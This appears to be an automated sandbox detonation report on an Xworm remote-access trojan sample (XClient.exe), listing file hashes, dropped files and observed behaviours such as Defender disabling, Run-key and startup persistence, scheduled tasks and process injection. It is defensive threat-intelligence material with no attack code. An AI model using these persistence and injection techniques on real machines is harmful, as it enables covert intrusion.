SHA512 90123975819cc2fc3030f94cc8bfce587e8c7efcca8c7ac8a1e99c5f3211c0a50fe16994836fb46fcb3a68b2157259a59f7a5928c19bba2fc3cb4059ecc8efa2

C:\Users\Admin\AppData\Local\Temp\vbc3B41AB182F4927863664736AA5672.TMP

MD5 312b4ecee3885e9c3518c369150d48da
SHA1 186a8142fc143cb84e18059ebfef1142f0be153d
SHA256 8aa04426ab5f454fdc34831ad53fab1f9933aac9a68b8c610e934d64aee5ae95
SHA512 efc831341d55ef19965d7532afd8b37ba06e2dab0085a9e29bfb4ee9f22cc31abe018373070f4f58eb9189d0e34ae74c0b7283f95532a00f2ee9fa0c97d2c5f2

C:\Users\Admin\AppData\Local\Temp\RESC76D.tmp

MD5 c4d069d728d9330ce28355fa9a594013
SHA1 91fce22137f25234eb6816602cc144a0d7f591bd
SHA256 66226d495ed0597eefa682830189a0b67ea96c569352695df174635ff66dcdca
SHA512 5f012dd67a116310a4f80eb2c8d04a0df2ad97f58ab171a396b28be97f42f0fb8b1b6fc1e3f40bc49eb8f50bb40ad87e434bef017bf83d2c135a846dcbc511e8

C:\Users\Admin\AppData\Local\Temp\arbdhjhr\arbdhjhr.exe

MD5 c4c12c8ddfa7191370e7b2ce701f8b5b
SHA1 93cc2a10c88ec83d31e72c78bf54bd57ca86684c
SHA256 f65239ce6769332b519130a9ef01bf1073c17f81c5fbe9b59e0fb258ce63fb99
SHA512 b96cd5b8b467269865a88ed13766223c96c7a51254dc6b7fcdd0d8ba08d1a4aabc7632cfe67da87885479f1296437584aac7da1da48a47843c4f95255879fcc1

memory/3668-32-0x000000001B110000-0x000000001B118000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2yps2p3l\2yps2p3l.cmdline

MD5 42ef8ba6f6c5595dc02e6eb783b159e6
SHA1 48223d9487c44d8c47c40fefe060a762156fd5c9
SHA256 0198d49ffd6f0b38435fe576195a5ce8f26402a8afe2297d8c9ec6399cb597cb
SHA512 0f14ad240cb083ac86dfdbbf6211df350c152602bbf9a149543efa97a95bc315c09cb507686faa030b0f4d6c3ede8d32af7a9d6ff602199803eff8a0b4187e92

C:\Users\Admin\AppData\Local\Temp\vbc369B539194FA46D9861547C9D3559A88.TMP

MD5 85130c51eeff5c77ed2257d145c8e0bb
SHA1 0742f51ec95c44d37f9003bfdbee89d739faee16
SHA256 b932913944c9381ccaabe98a8352f1cb260e70322f6af29ac6d3c7eebc76dc49
SHA512 b6e4db8099fac97302eaa105f0a06730de1989ffa2d81b9adca19358b078a8d3cbf8c7ee812d6084f7d613392d6df86c034fb25f353de203b8fc8d2777a5ca94

C:\Users\Admin\AppData\Local\Temp\RESF2C3.tmp

MD5 3d462ceede08fcd6f8b0a7d07fcbb3c5
SHA1 6dbac8bbc37054746376ed707412a0d00e1afb4a
SHA256 7261f0746b8eb35fa9afc09f0ef66a6c485bf11d48395ddc366497d0fd399e19
SHA512 2f12b17a8318fb7f26827ba46b538d4fa163f2d9335f6ddb65f71ec13f2df4eaff260ec127969130d6a868f37b0aac8f66da0df4ebb829bd2193d208f6799297

C:\Users\Admin\AppData\Local\Temp\2yps2p3l\2yps2p3l.exe

MD5 98a9c09624157f127d1dc60470ef5217
SHA1 2c0d0c58426615b9aca357477a1053ee9c12c5f0
SHA256 f5029329384defc1dd748b8295c72a8318779ca7eb8fc97153d7d47682ec9311
SHA512 09e01dab4af4ea1d31d86459fa7d17b34f9e9b1360552a78895dea1c6d7402cc362327dbc2c1ce3e447705676c9d9e9d348fde0321c03289289c6bb495130108

memory/3668-48-0x000000001B460000-0x000000001B468000-memory.dmp

memory/3668-51-0x000000001B330000-0x000000001B33A000-memory.dmp

memory/3668-52-0x000000001B230000-0x000000001B23A000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-30 20:07

Reported

2024-05-30 20:42

Platform

win11-20240508-en

Max time kernel

1797s

Max time network

1798s

Command Line

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ogamcm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bwasen.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\9 N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Windows\CurrentVersion\Run\9 = "C:\\Users\\Admin\\AppData\\Roaming\\9" C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3032 set thread context of 3708 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\explorer.exe N/A
Key created \Registry\User\S-1-5-21-2457560273-69882387-977367775-1000_Classes\NotificationData C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\Downloads\msvcp140d.zip:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\msvcp140d(1).zip:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\vcruntime140d.zip:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\vcruntime140_1d.zip:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\ucrtbase.zip:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\9 N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3032 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\schtasks.exe
PID 3032 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\schtasks.exe
PID 3728 wrote to memory of 1908 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3728 wrote to memory of 1908 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3728 wrote to memory of 1908 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3728 wrote to memory of 1908 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3728 wrote to memory of 1908 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3728 wrote to memory of 1908 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3728 wrote to memory of 1908 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
